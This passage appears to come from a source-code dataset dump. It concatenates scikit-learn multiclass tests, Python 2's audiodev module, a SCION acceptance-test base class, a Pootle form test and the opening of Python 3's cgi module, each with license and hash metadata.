ovo = OneVsOneClassifier(LinearSVC(random_state=0))
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ovo, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert best_C in Cs
def test_ovo_ties():
# Test that ties are broken using the decision function,
# not defaulting to the smallest label
X = np.array([[1, 2], [2, 1], [-2, 1], [-2, -1]])
y = np.array([2, 0, 1, 2])
multi_clf = OneVsOneClassifier(Perceptron(shuffle=False, max_iter=4,
tol=None))
ovo_prediction = multi_clf.fit(X, y).predict(X)
ovo_decision = multi_clf.decision_function(X)
# Classifiers are in order 0-1, 0-2, 1-2
# Use decision_function to compute the votes and the normalized
# sum_of_confidences, which is used to disambiguate when there is a tie in
# votes.
votes = np.round(ovo_decision)
normalized_confidences = ovo_decision - votes
# For the first point, there is one vote per class
assert_array_equal(votes[0, :], 1)
# For the rest, there is no tie and the prediction is the argmax
assert_array_equal(np.argmax(votes[1:], axis=1), ovo_prediction[1:])
# For the tie, the prediction is the class with the highest score
assert ovo_prediction[0] == normalized_confidences[0].argmax()
def test_ovo_ties2():
# test that ties can not only be won by the first two labels
X = np.array([[1, 2], [2, 1], [-2, 1], [-2, -1]])
y_ref = np.array([2, 0, 1, 2])
# cycle through labels so that each label wins once
for i in range(3):
y = (y_ref + i) % 3
multi_clf = OneVsOneClassifier(Perceptron(shuffle=False, max_iter=4,
tol=None))
ovo_prediction = multi_clf.fit(X, y).predict(X)
assert ovo_prediction[0] == i % 3
def test_ovo_string_y():
# Test that the OvO doesn't mess up the encoding of string labels
X = np.eye(4)
y = np.array(['a', 'b', 'c', 'd'])
ovo = OneVsOneClassifier(LinearSVC())
ovo.fit(X, y)
assert_array_equal(y, ovo.predict(X))
def test_ovo_one_class():
# Test error for OvO with one class
X = np.eye(4)
y = np.array(['a'] * 4)
ovo = OneVsOneClassifier(LinearSVC())
msg = "when only one class"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
def test_ovo_float_y():
# Test that the OvO errors on float targets
X = iris.data
y = iris.data[:, 0]
ovo = OneVsOneClassifier(LinearSVC())
msg = "Unknown label type"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
def test_ecoc_exceptions():
ecoc = OutputCodeClassifier(LinearSVC(random_state=0))
with pytest.raises(NotFittedError):
ecoc.predict([])
def test_ecoc_fit_predict():
# A classifier which implements decision_function.
ecoc = OutputCodeClassifier(LinearSVC(random_state=0),
code_size=2, random_state=0)
ecoc.fit(iris.data, iris.target).predict(iris.data)
assert len(ecoc.estimators_) == n_classes * 2
# A classifier which implements predict_proba.
ecoc = OutputCodeClassifier(MultinomialNB(), code_size=2, random_state=0)
ecoc.fit(iris.data, iris.target).predict(iris.data)
assert len(ecoc.estimators_) == n_classes * 2
def test_ecoc_gridsearch():
ecoc = OutputCodeClassifier(LinearSVC(random_state=0),
random_state=0)
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ecoc, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert best_C in Cs
def test_ecoc_float_y():
# Test that the OCC errors on float targets
X = iris.data
y = iris.data[:, 0]
ovo = OutputCodeClassifier(LinearSVC())
msg = "Unknown label type"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
ovo = OutputCodeClassifier(LinearSVC(), code_size=-1)
msg = "code_size should be greater than 0, got -1"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
def test_ecoc_delegate_sparse_base_estimator():
# Non-regression test for
# https://github.com/scikit-learn/scikit-learn/issues/17218
X, y = iris.data, iris.target
X_sp = sp.csc_matrix(X)
# create an estimator that does not support sparse input
base_estimator = CheckingClassifier(
check_X=check_array,
check_X_params={"ensure_2d": True, "accept_sparse": False},
)
ecoc = OutputCodeClassifier(base_estimator, random_state=0)
with pytest.raises(TypeError, match="A sparse matrix was passed"):
ecoc.fit(X_sp, y)
ecoc.fit(X, y)
with pytest.raises(TypeError, match="A sparse matrix was passed"):
ecoc.predict(X_sp)
# smoke test to check when sparse input should be supported
ecoc = OutputCodeClassifier(LinearSVC(random_state=0))
ecoc.fit(X_sp, y).predict(X_sp)
assert len(ecoc.estimators_) == 4
def test_pairwise_indices():
clf_precomputed = svm.SVC(kernel='precomputed')
X, y = iris.data, iris.target
ovr_false = OneVsOneClassifier(clf_precomputed)
linear_kernel = np.dot(X, X.T)
ovr_false.fit(linear_kernel, y)
n_estimators = len(ovr_false.estimators_)
precomputed_indices = ovr_false.pairwise_indices_
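    # With the 3 balanced iris classes there are 3 OvO estimators, and each
    # one is trained on the samples of 2 of the 3 classes, i.e. a fraction
    # (n_estimators - 1) / n_estimators of the full kernel rows.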
for idx in precomputed_indices:
assert (idx.shape[0] * n_estimators / (n_estimators - 1) ==
linear_kernel.shape[0])
@ignore_warnings(category=FutureWarning)
def test_pairwise_attribute():
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC()
for MultiClassClassifier in [OneVsRestClassifier, OneVsOneClassifier]:
ovr_false = MultiClassClassifier(clf_notprecomputed)
assert not ovr_false._pairwise
ovr_true = MultiClassClassifier(clf_precomputed)
assert ovr_true._pairwise
@pytest.mark.parametrize("MultiClassClassifier", [OneVsRestClassifier,
OneVsOneClassifier])
def test_pairwise_tag(MultiClassClassifier):
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC()
ovr_false = MultiClassClassifier(clf_notprecomputed)
assert not ovr_false._get_tags()["pairwise"]
ovr_true = MultiClassClassifier(clf_precomputed)
assert ovr_true._get_tags()["pairwise"]
# TODO: Remove in 1.1
@pytest.mark.parametrize("MultiClassClassifier", [OneVsRestClassifier,
OneVsOneClassifier])
def test_pairwise_deprecated(MultiClassClassifier):
clf_precomputed = svm.SVC(kernel='precomputed')
ov_clf = MultiClassClassifier(clf_precomputed)
msg = r"Attribute _pairwise was deprecated in version 0\.24"
with pytest.warns(FutureWarning, match=msg):
ov_clf._pairwise
def test_pairwise_cross_val_score():
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC(kernel='linear')
X, y = iris.data, iris.target
for MultiClassClassifier in [OneVsRestClassifier, OneVsOneClassifier]:
ovr_false = MultiClassClassifier(clf_notprecomputed)
ovr_true = MultiClassClassifier(clf_precomputed)
linear_kernel = np.dot(X, X.T)
score_precomputed = cross_val_score(ovr_true, linear_kernel, y)
score_linear = cross_val_score(ovr_false, X, y)
assert_array_equal(score_precomputed, score_linear)
@pytest.mark.parametrize("MultiClassClassifier",
[OneVsRestClassifier, OneVsOneClassifier])
# FIXME: we should move this test into `estimator_checks` once we are able
# to construct meta-estimator instances
def test_support_missing_values(MultiClassClassifier):
    # smoke test to check that pipeline OvR and OvO classifiers are delegating
    # the validation of missing values to
    # the underlying pipeline or classifiers
rng = np.random.RandomState(42)
X, y = iris.data, iris.target
X = np.copy(X) # Copy to avoid that the original data is modified
mask = rng.choice([1, 0], X.shape, p=[.1, .9]).astype(bool)
X[mask] = np.nan
lr = make_pipeline(SimpleImputer(),
LogisticRegression(random_state=rng))
MultiClassClassifier(lr).fit(X, y).score(X, y)
| bsd-3-clause | 7,494,563,634,628,996,000 | 36.599311 | 78 | 0.605759 | false |
mchristopher/PokemonGo-DesktopMap | app/pywin/Lib/audiodev.py | 286 | 7597 | """Classes for manipulating audio devices (currently only for Sun and SGI)"""
from warnings import warnpy3k
warnpy3k("the audiodev module has been removed in Python 3.0", stacklevel=2)
del warnpy3k
__all__ = ["error","AudioDev"]
class error(Exception):
pass
class Play_Audio_sgi:
# Private instance variables
## if 0: access frameratelist, nchannelslist, sampwidthlist, oldparams, \
## params, config, inited_outrate, inited_width, \
## inited_nchannels, port, converter, classinited: private
classinited = 0
frameratelist = nchannelslist = sampwidthlist = None
def initclass(self):
import AL
self.frameratelist = [
(48000, AL.RATE_48000),
(44100, AL.RATE_44100),
(32000, AL.RATE_32000),
(22050, AL.RATE_22050),
(16000, AL.RATE_16000),
(11025, AL.RATE_11025),
( 8000, AL.RATE_8000),
]
self.nchannelslist = [
(1, AL.MONO),
(2, AL.STEREO),
(4, AL.QUADRO),
]
self.sampwidthlist = [
(1, AL.SAMPLE_8),
(2, AL.SAMPLE_16),
(3, AL.SAMPLE_24),
]
self.classinited = 1
def __init__(self):
import al, AL
if not self.classinited:
self.initclass()
self.oldparams = []
self.params = [AL.OUTPUT_RATE, 0]
self.config = al.newconfig()
self.inited_outrate = 0
self.inited_width = 0
self.inited_nchannels = 0
self.converter = None
self.port = None
return
def __del__(self):
if self.port:
self.stop()
if self.oldparams:
import al, AL
al.setparams(AL.DEFAULT_DEVICE, self.oldparams)
self.oldparams = []
def wait(self):
if not self.port:
return
import time
while self.port.getfilled() > 0:
time.sleep(0.1)
self.stop()
def stop(self):
if self.port:
self.port.closeport()
self.port = None
if self.oldparams:
import al, AL
al.setparams(AL.DEFAULT_DEVICE, self.oldparams)
self.oldparams = []
def setoutrate(self, rate):
for (raw, cooked) in self.frameratelist:
if rate == raw:
self.params[1] = cooked
self.inited_outrate = 1
break
else:
raise error, 'bad output rate'
def setsampwidth(self, width):
for (raw, cooked) in self.sampwidthlist:
if width == raw:
self.config.setwidth(cooked)
self.inited_width = 1
break
else:
if width == 0:
import AL
self.inited_width = 0
self.config.setwidth(AL.SAMPLE_16)
self.converter = self.ulaw2lin
else:
raise error, 'bad sample width'
def setnchannels(self, nchannels):
for (raw, cooked) in self.nchannelslist:
if nchannels == raw:
self.config.setchannels(cooked)
self.inited_nchannels = 1
break
else:
raise error, 'bad # of channels'
def writeframes(self, data):
if not (self.inited_outrate and self.inited_nchannels):
raise error, 'params not specified'
if not self.port:
import al, AL
self.port = al.openport('Python', 'w', self.config)
self.oldparams = self.params[:]
al.getparams(AL.DEFAULT_DEVICE, self.oldparams)
al.setparams(AL.DEFAULT_DEVICE, self.params)
if self.converter:
data = self.converter(data)
self.port.writesamps(data)
def getfilled(self):
if self.port:
return self.port.getfilled()
else:
return 0
def getfillable(self):
if self.port:
return self.port.getfillable()
else:
return self.config.getqueuesize()
# private methods
## if 0: access *: private
def ulaw2lin(self, data):
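        # decode u-law encoded bytes to 16-bit linear samples for the AL output port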
import audioop
return audioop.ulaw2lin(data, 2)
class Play_Audio_sun:
## if 0: access outrate, sampwidth, nchannels, inited_outrate, inited_width, \
## inited_nchannels, converter: private
def __init__(self):
self.outrate = 0
self.sampwidth = 0
self.nchannels = 0
self.inited_outrate = 0
self.inited_width = 0
self.inited_nchannels = 0
self.converter = None
self.port = None
return
def __del__(self):
self.stop()
def setoutrate(self, rate):
self.outrate = rate
self.inited_outrate = 1
def setsampwidth(self, width):
self.sampwidth = width
self.inited_width = 1
def setnchannels(self, nchannels):
self.nchannels = nchannels
self.inited_nchannels = 1
def writeframes(self, data):
if not (self.inited_outrate and self.inited_width and self.inited_nchannels):
raise error, 'params not specified'
if not self.port:
import sunaudiodev, SUNAUDIODEV
self.port = sunaudiodev.open('w')
info = self.port.getinfo()
info.o_sample_rate = self.outrate
info.o_channels = self.nchannels
if self.sampwidth == 0:
info.o_precision = 8
self.o_encoding = SUNAUDIODEV.ENCODING_ULAW
# XXX Hack, hack -- leave defaults
else:
info.o_precision = 8 * self.sampwidth
info.o_encoding = SUNAUDIODEV.ENCODING_LINEAR
self.port.setinfo(info)
if self.converter:
data = self.converter(data)
self.port.write(data)
def wait(self):
if not self.port:
return
self.port.drain()
self.stop()
def stop(self):
if self.port:
self.port.flush()
self.port.close()
self.port = None
def getfilled(self):
if self.port:
return self.port.obufcount()
else:
return 0
## # Nobody remembers what this method does, and it's broken. :-(
## def getfillable(self):
## return BUFFERSIZE - self.getfilled()
def AudioDev():
# Dynamically try to import and use a platform specific module.
try:
import al
except ImportError:
try:
import sunaudiodev
return Play_Audio_sun()
except ImportError:
try:
import Audio_mac
except ImportError:
raise error, 'no audio device'
else:
return Audio_mac.Play_Audio_mac()
else:
return Play_Audio_sgi()
def test(fn = None):
import sys
if sys.argv[1:]:
fn = sys.argv[1]
else:
fn = 'f:just samples:just.aif'
import aifc
af = aifc.open(fn, 'r')
print fn, af.getparams()
p = AudioDev()
p.setoutrate(af.getframerate())
p.setsampwidth(af.getsampwidth())
p.setnchannels(af.getnchannels())
BUFSIZ = af.getframerate()/af.getsampwidth()/af.getnchannels()
while 1:
data = af.readframes(BUFSIZ)
if not data: break
print len(data)
p.writeframes(data)
p.wait()
if __name__ == '__main__':
test()
| mit | 8,759,556,957,160,831,000 | 28.219231 | 85 | 0.529946 | false |
Oncilla/scion | acceptance/common/base.py | 1 | 7373 | # Copyright 2019 Anapaya Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import re
import typing
from plumbum import cli
from plumbum import local
from plumbum import cmd
from plumbum import path
from acceptance.common.docker import Compose
from acceptance.common.log import LogExec
from acceptance.common.scion import SCION, SCIONSupervisor
NAME = 'NOT_SET' # must be set by users of the Base class.
DIR = 'NOT_SET'
logger = logging.getLogger(__name__)
def set_name(file: str):
global NAME
global DIR
DIR = local.path(file).dirname.name
NAME = DIR[:-len('_acceptance')]
class TestState:
"""
TestState is used to share state between the command
and the sub-command.
"""
artifacts = None
def __init__(self, scion: SCION, dc: Compose):
"""
Create new environment state for an execution of the acceptance
testing framework. Plumbum subcommands can access this state
via the parent to retrieve information about the test environment.
"""
self.scion = scion
self.dc = dc
self.topology_tar = ""
self.containers_tar = ""
if 'TEST_UNDECLARED_OUTPUTS_DIR' in os.environ:
self.artifacts = local.path(os.environ['TEST_UNDECLARED_OUTPUTS_DIR'])
else:
self.artifacts = local.path("/tmp/artifacts-scion")
self.dc.compose_file = self.artifacts / 'gen/scion-dc.yml'
self.no_docker = False
self.tools_dc = local['./tools/dc']
class TestBase(cli.Application):
"""
TestBase is used to implement the test entry point. Tests should
sub-class it and only define the doc string.
"""
test_state = None # type: TestState
@cli.switch('disable-docker', envname='DISABLE_DOCKER',
help='Run in supervisor environment.')
def disable_docker(self):
self.test_state.no_docker = True
self.test_state.scion = SCIONSupervisor()
@cli.switch('artifacts', str, envname='ACCEPTANCE_ARTIFACTS',
help='Artifacts directory (for legacy tests)')
def artifacts_dir(self, a_dir: str):
self.test_state.artifacts = local.path('%s/%s/' % (a_dir, NAME))
@cli.switch('artifacts_dir', str, help='Artifacts directory (for bazel tests)')
def artifacts_dir_new(self, a_dir: str):
self.test_state.artifacts = local.path(a_dir)
self.test_state.dc.compose_file = self.test_state.artifacts / 'gen/scion-dc.yml'
@cli.switch('topology_tar', str, help="The tarball with the topology files")
def topology_tar(self, tar: str):
self.test_state.topology_tar = tar
@cli.switch('containers_tar', str, help="The tarball with the containers")
def containers_tar(self, tar: str):
self.test_state.containers_tar = tar
@cli.switch('bazel_rule', str, help="The bazel rule that triggered the test")
def test_type(self, rule: str):
self.test_state.bazel_rule = rule
def _unpack_topo(self):
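        # extract the topology tarball and rewrite $SCIONROOT placeholders to the artifacts dir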
cmd.tar('-xf', self.test_state.topology_tar, '-C', self.test_state.artifacts)
cmd.sed('-i', 's#$SCIONROOT#%s#g' % self.test_state.artifacts,
self.test_state.artifacts / 'gen/scion-dc.yml')
self.test_state.dc.compose_file = self.test_state.artifacts / 'gen/scion-dc.yml'
def setup_prepare(self):
"""Unpacks the topology and loads local docker images.
"""
# Delete old artifacts, if any.
cmd.rm("-rf", self.test_state.artifacts)
cmd.mkdir(self.test_state.artifacts)
print('artifacts dir: %s' % self.test_state.artifacts)
self._unpack_topo()
print(cmd.docker('image', 'load', '-i', self.test_state.containers_tar))
def setup(self):
self.setup_prepare()
self.setup_start()
def setup_start(self):
"""Starts the docker containers in the topology.
"""
print(self.test_state.dc('up', '-d'))
print(self.test_state.dc('ps'))
def teardown(self):
out_dir = self.test_state.artifacts / 'logs'
self.test_state.dc.collect_logs(out_dir=out_dir)
ps = self.test_state.dc('ps')
print(self.test_state.dc('down', '-v'))
if re.search(r"Exit\s+[1-9]\d*", ps):
raise Exception("Failed services.\n" + ps)
def send_signal(self, container, signal):
"""Sends signal to a container.
Args:
container: the name of the container.
signal: the signal to send
"""
print(self.test_state.dc("kill", "-s", signal, container))
class CmdBase(cli.Application):
""" CmdBase is used to implement the test sub-commands. """
tools_dc = local['./tools/dc']
def cmd_dc(self, *args):
for line in self.dc(*args).splitlines():
print(line)
def cmd_setup(self):
cmd.mkdir('-p', self.artifacts)
def cmd_teardown(self):
if not self.no_docker:
self.dc.collect_logs(self.artifacts / 'logs' / 'docker')
self.tools_dc('down')
self.scion.stop()
def _collect_logs(self, name: str):
if path.local.LocalPath('gen/%s-dc.yml' % name).exists():
self.tools_dc('collect_logs', name, self.artifacts / 'logs' / 'docker')
def _teardown(self, name: str):
if path.local.LocalPath('gen/%s-dc.yml' % name).exists():
self.tools_dc(name, 'down')
@staticmethod
def test_dir(prefix: str = '', directory: str = 'acceptance') -> path.local.LocalPath:
return local.path(prefix, directory) / DIR
@staticmethod
def docker_status():
logger.info('Docker containers')
print(cmd.docker('ps', '-a', '-s'))
@property
def dc(self):
return self.parent.test_state.dc
@property
def artifacts(self):
return self.parent.test_state.artifacts
@property
def scion(self):
return self.parent.test_state.scion
@property
def no_docker(self):
return self.parent.test_state.no_docker
@TestBase.subcommand('name')
class TestName(CmdBase):
def main(self):
print(NAME)
@TestBase.subcommand('teardown')
class TestTeardown(CmdBase):
"""
    Tear down the topology by stopping all running services.
In a dockerized topology, the logs are collected.
"""
@LogExec(logger, 'teardown')
def main(self):
self.cmd_teardown()
def register_commands(c: typing.Type[TestBase]):
"""
Registers the default subcommands to the test class c.
"""
class TestSetup(c):
def main(self):
self.setup()
class TestRun(c):
def main(self):
self._run()
class TestTeardown(c):
def main(self):
self.teardown()
c.subcommand("setup", TestSetup)
c.subcommand("run", TestRun)
c.subcommand("teardown", TestTeardown)
| apache-2.0 | 7,475,001,507,042,508,000 | 30.241525 | 90 | 0.630408 | false |
unho/pootle | tests/pootle_app/forms.py | 5 | 1571 | # -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import pytest
from pootle_app.forms import PermissionsUsersSearchForm
from pootle_app.models.permissions import PermissionSet, get_pootle_permission
@pytest.mark.django_db
def test_form_permissions_users(project0, member, member2):
# must supply a directory
with pytest.raises(KeyError):
PermissionsUsersSearchForm()
form = PermissionsUsersSearchForm(
directory=project0.directory, data={})
assert not form.is_valid()
assert "q" in form.errors
form = PermissionsUsersSearchForm(
directory=project0.directory,
data=dict(q="mem"))
assert form.is_valid()
assert form.cleaned_data == dict(q="mem")
results = form.search()["results"]
assert results[0]['text'] == member.username
assert results[0]['id'] == member.pk
assert results[1]['text'] == member2.username
assert results[1]['id'] == member2.pk
# providing a user with permissions in this directory
# means they are excluded from search results
view = get_pootle_permission('view')
perm_set = PermissionSet.objects.create(
user=member,
directory=project0.directory)
perm_set.positive_permissions.add(view)
assert form.search() == {
'results': [
{'text': member2.username, 'id': member2.pk}]}
| gpl-3.0 | -6,699,444,047,953,784,000 | 31.061224 | 78 | 0.688733 | false |
glwu/python-for-android | python3-alpha/python3-src/Lib/cgi.py | 46 | 34484 | #! /usr/local/bin/python
# NOTE: the above "/usr/local/bin/python" is NOT a mistake. It is
# intentionally NOT "/usr/bin/env python". On many systems
# (e.g. Solaris), /usr/local/bin is not in $PATH as passed to CGI
# scripts, and /usr/local/bin is the default directory where Python is
# installed, so /usr/bin/env would be unable to find python. Granted,
# binary installations by Linux vendors often install Python in
# /usr/bin. So let those vendors patch cgi.py to match their choice
# of installation.
"""Support module for CGI (Common Gateway Interface) scripts.
This module defines a number of utilities for use by CGI scripts
written in Python.
"""
# History
# -------
#
# Michael McLay started this module. Steve Majewski changed the
# interface to SvFormContentDict and FormContentDict. The multipart
# parsing was inspired by code submitted by Andreas Paepcke. Guido van
# Rossum rewrote, reformatted and documented the module and is currently
# responsible for its maintenance.
#
__version__ = "2.6"
# Imports
# =======
from io import StringIO, BytesIO, TextIOWrapper
import sys
import os
import urllib.parse
from email.parser import FeedParser
from warnings import warn
import html
import locale
import tempfile
__all__ = ["MiniFieldStorage", "FieldStorage",
"parse", "parse_qs", "parse_qsl", "parse_multipart",
"parse_header", "print_exception", "print_environ",
"print_form", "print_directory", "print_arguments",
"print_environ_usage", "escape"]
# Logging support
# ===============
logfile = "" # Filename to log to, if not empty
logfp = None # File object to log to, if not None
def initlog(*allargs):
"""Write a log message, if there is a log file.
Even though this function is called initlog(), you should always
use log(); log is a variable that is set either to initlog
(initially), to dolog (once the log file has been opened), or to
nolog (when logging is disabled).
The first argument is a format string; the remaining arguments (if
any) are arguments to the % operator, so e.g.
log("%s: %s", "a", "b")
will write "a: b" to the log file, followed by a newline.
If the global logfp is not None, it should be a file object to
which log data is written.
If the global logfp is None, the global logfile may be a string
giving a filename to open, in append mode. This file should be
world writable!!! If the file can't be opened, logging is
silently disabled (since there is no safe place where we could
send an error message).
"""
global logfp, log
if logfile and not logfp:
try:
logfp = open(logfile, "a")
except IOError:
pass
if not logfp:
log = nolog
else:
log = dolog
log(*allargs)
def dolog(fmt, *args):
"""Write a log message to the log file. See initlog() for docs."""
logfp.write(fmt%args + "\n")
def nolog(*allargs):
"""Dummy function, assigned to log when logging is disabled."""
pass
log = initlog # The current logging function
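# Illustrative use of the logging hooks (a sketch; the log path is
# hypothetical):
#
#   import cgi
#   cgi.logfile = "/tmp/cgi.log"   # must be writable by the web server
#   cgi.log("%s: %s", "a", "b")    # appends "a: b\n" on first use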
# Parsing functions
# =================
# Maximum input we will accept when REQUEST_METHOD is POST
# 0 ==> unlimited input
maxlen = 0
def parse(fp=None, environ=os.environ, keep_blank_values=0, strict_parsing=0):
"""Parse a query in the environment or from a file (default stdin)
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
"""
if fp is None:
fp = sys.stdin
# field keys and values (except for files) are returned as strings
# an encoding is required to decode the bytes read from self.fp
if hasattr(fp,'encoding'):
encoding = fp.encoding
else:
encoding = 'latin-1'
# fp.read() must return bytes
if isinstance(fp, TextIOWrapper):
fp = fp.buffer
if not 'REQUEST_METHOD' in environ:
environ['REQUEST_METHOD'] = 'GET' # For testing stand-alone
if environ['REQUEST_METHOD'] == 'POST':
ctype, pdict = parse_header(environ['CONTENT_TYPE'])
if ctype == 'multipart/form-data':
return parse_multipart(fp, pdict)
elif ctype == 'application/x-www-form-urlencoded':
clength = int(environ['CONTENT_LENGTH'])
if maxlen and clength > maxlen:
raise ValueError('Maximum content length exceeded')
qs = fp.read(clength).decode(encoding)
else:
qs = '' # Unknown content-type
if 'QUERY_STRING' in environ:
if qs: qs = qs + '&'
qs = qs + environ['QUERY_STRING']
elif sys.argv[1:]:
if qs: qs = qs + '&'
qs = qs + sys.argv[1]
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
elif 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
else:
if sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
return urllib.parse.parse_qs(qs, keep_blank_values, strict_parsing,
encoding=encoding)
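# Illustrative result (a sketch): with QUERY_STRING set to "a=1&a=2&b=3",
# parse() returns {'a': ['1', '2'], 'b': ['3']} -- every value is a list.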
# parse query string function called from urlparse,
# this is done in order to maintain backward compatibility.
def parse_qs(qs, keep_blank_values=0, strict_parsing=0):
"""Parse a query given as a string argument."""
warn("cgi.parse_qs is deprecated, use urllib.parse.parse_qs instead",
DeprecationWarning, 2)
return urllib.parse.parse_qs(qs, keep_blank_values, strict_parsing)
def parse_qsl(qs, keep_blank_values=0, strict_parsing=0):
"""Parse a query given as a string argument."""
warn("cgi.parse_qsl is deprecated, use urllib.parse.parse_qsl instead",
DeprecationWarning, 2)
return urllib.parse.parse_qsl(qs, keep_blank_values, strict_parsing)
def parse_multipart(fp, pdict):
"""Parse multipart input.
Arguments:
fp : input file
pdict: dictionary containing other parameters of content-type header
Returns a dictionary just like parse_qs(): keys are the field names, each
value is a list of values for that field. This is easy to use but not
much good if you are expecting megabytes to be uploaded -- in that case,
use the FieldStorage class instead which is much more flexible. Note
that content-type is the raw, unparsed contents of the content-type
header.
XXX This does not parse nested multipart parts -- use FieldStorage for
that.
XXX This should really be subsumed by FieldStorage altogether -- no
point in having two implementations of the same parsing algorithm.
Also, FieldStorage protects itself better against certain DoS attacks
by limiting the size of the data read in one chunk. The API here
does not support that kind of protection. This also affects parse()
since it can call parse_multipart().
"""
import http.client
boundary = ""
if 'boundary' in pdict:
boundary = pdict['boundary']
if not valid_boundary(boundary):
raise ValueError('Invalid boundary in multipart form: %r'
% (boundary,))
nextpart = "--" + boundary
lastpart = "--" + boundary + "--"
partdict = {}
terminator = ""
while terminator != lastpart:
bytes = -1
data = None
if terminator:
# At start of next part. Read headers first.
headers = http.client.parse_headers(fp)
clength = headers.get('content-length')
if clength:
try:
bytes = int(clength)
except ValueError:
pass
if bytes > 0:
if maxlen and bytes > maxlen:
raise ValueError('Maximum content length exceeded')
data = fp.read(bytes)
else:
data = ""
# Read lines until end of part.
lines = []
while 1:
line = fp.readline()
if not line:
terminator = lastpart # End outer loop
break
if line.startswith("--"):
terminator = line.rstrip()
if terminator in (nextpart, lastpart):
break
lines.append(line)
# Done with part.
if data is None:
continue
if bytes < 0:
if lines:
# Strip final line terminator
line = lines[-1]
if line[-2:] == "\r\n":
line = line[:-2]
elif line[-1:] == "\n":
line = line[:-1]
lines[-1] = line
data = "".join(lines)
line = headers['content-disposition']
if not line:
continue
key, params = parse_header(line)
if key != 'form-data':
continue
if 'name' in params:
name = params['name']
else:
continue
if name in partdict:
partdict[name].append(data)
else:
partdict[name] = [data]
return partdict
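# Illustrative use (a sketch; assumes "fp" is a binary stream positioned at
# the start of a multipart/form-data body and "ctype_header" holds the raw
# Content-Type header value):
#
#   ctype, pdict = parse_header(ctype_header)
#   if ctype == 'multipart/form-data':
#       fields = parse_multipart(fp, pdict)   # e.g. {'name': ['value']}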
def _parseparam(s):
while s[:1] == ';':
s = s[1:]
end = s.find(';')
while end > 0 and s.count('"', 0, end) % 2:
end = s.find(';', end + 1)
if end < 0:
end = len(s)
f = s[:end]
yield f.strip()
s = s[end:]
def parse_header(line):
"""Parse a Content-type like header.
Return the main content-type and a dictionary of options.
"""
parts = _parseparam(';' + line)
key = parts.__next__()
pdict = {}
for p in parts:
i = p.find('=')
if i >= 0:
name = p[:i].strip().lower()
value = p[i+1:].strip()
if len(value) >= 2 and value[0] == value[-1] == '"':
value = value[1:-1]
value = value.replace('\\\\', '\\').replace('\\"', '"')
pdict[name] = value
return key, pdict
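# Illustrative result (a sketch):
#   parse_header('text/html; charset="utf-8"')
#   == ('text/html', {'charset': 'utf-8'})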
# Classes for field storage
# =========================
class MiniFieldStorage:
"""Like FieldStorage, for use when no file uploads are possible."""
# Dummy attributes
filename = None
list = None
type = None
file = None
type_options = {}
disposition = None
disposition_options = {}
headers = {}
def __init__(self, name, value):
"""Constructor from field name and value."""
self.name = name
self.value = value
# self.file = StringIO(value)
def __repr__(self):
"""Return printable representation."""
return "MiniFieldStorage(%r, %r)" % (self.name, self.value)
class FieldStorage:
"""Store a sequence of fields, reading multipart/form-data.
This class provides naming, typing, files stored on disk, and
more. At the top level, it is accessible like a dictionary, whose
keys are the field names. (Note: None can occur as a field name.)
The items are either a Python list (if there's multiple values) or
another FieldStorage or MiniFieldStorage object. If it's a single
object, it has the following attributes:
name: the field name, if specified; otherwise None
filename: the filename, if specified; otherwise None; this is the
client side filename, *not* the file name on which it is
stored (that's a temporary file you don't deal with)
value: the value as a *string*; for file uploads, this
transparently reads the file every time you request the value
and returns *bytes*
file: the file(-like) object from which you can read the data *as
        bytes*; None if the data is stored as a simple string
type: the content-type, or None if not specified
type_options: dictionary of options specified on the content-type
line
disposition: content-disposition, or None if not specified
disposition_options: dictionary of corresponding options
headers: a dictionary(-like) object (sometimes email.message.Message or a
subclass thereof) containing *all* headers
The class is subclassable, mostly for the purpose of overriding
the make_file() method, which is called internally to come up with
a file open for reading and writing. This makes it possible to
override the default choice of storing all files in a temporary
directory and unlinking them as soon as they have been opened.
"""
def __init__(self, fp=None, headers=None, outerboundary=b'',
environ=os.environ, keep_blank_values=0, strict_parsing=0,
limit=None, encoding='utf-8', errors='replace'):
"""Constructor. Read multipart/* until last part.
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
(not used when the request method is GET)
Can be :
1. a TextIOWrapper object
2. an object whose read() and readline() methods return bytes
headers : header dictionary-like object; default:
taken from environ as per CGI spec
outerboundary : terminating multipart boundary
(for internal use only)
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
limit : used internally to read parts of multipart/form-data forms,
to exit from the reading loop when reached. It is the difference
